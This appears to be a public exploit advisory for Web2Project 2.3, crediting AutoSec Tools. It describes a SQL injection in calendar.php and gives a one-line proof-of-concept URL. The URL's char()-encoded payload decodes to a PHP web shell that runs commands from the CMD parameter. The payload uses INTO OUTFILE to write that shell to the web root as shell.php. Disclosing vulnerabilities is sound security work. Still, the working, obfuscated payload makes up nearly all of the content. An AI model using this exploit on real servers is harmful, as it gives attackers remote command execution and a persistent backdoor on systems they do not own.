24 lines
No EOL
1.2 KiB
Text
24 lines
No EOL
1.2 KiB
Text
# ------------------------------------------------------------------------
|
|
# Software................Web2Project 2.3
|
|
# Vulnerability...........SQL Injection
|
|
# Threat Level............Critical (4/5)
|
|
# Download................http://forums.web2project.net/
|
|
# Discovery Date..........4/21/2011
|
|
# Tested On...............Windows Vista + XAMPP
|
|
# ------------------------------------------------------------------------
|
|
# Author..................AutoSec Tools
|
|
# Site....................http://www.autosectools.com/
|
|
# Email...................John Leitch <john@autosectools.com>
|
|
# ------------------------------------------------------------------------
|
|
#
|
|
#
|
|
# --Description--
|
|
#
|
|
# A SQL injection vulnerability in Web2Project 2.3 can be exploited to
|
|
# extract arbitrary data. In some environments it may be possible to
|
|
# create a PHP shell.
|
|
#
|
|
#
|
|
# --PoC--
|
|
|
|
http://localhost/web2project-2.3/calendar.php?token='UNION/**/SELECT/**/CONCAT(char(60),char(63),char(112),char(104),char(112),char(32),char(115),char(121),char(115),char(116),char(101),char(109),char(40),char(36),char(95),char(71),char(69),char(84),char(91),char(39),char(67),char(77),char(68),char(39),char(93),char(41),char(59),char(32),char(63),char(62))/**/FROM/**/dual/**/INTO/**/OUTFILE'../../htdocs/shell.php'%23 |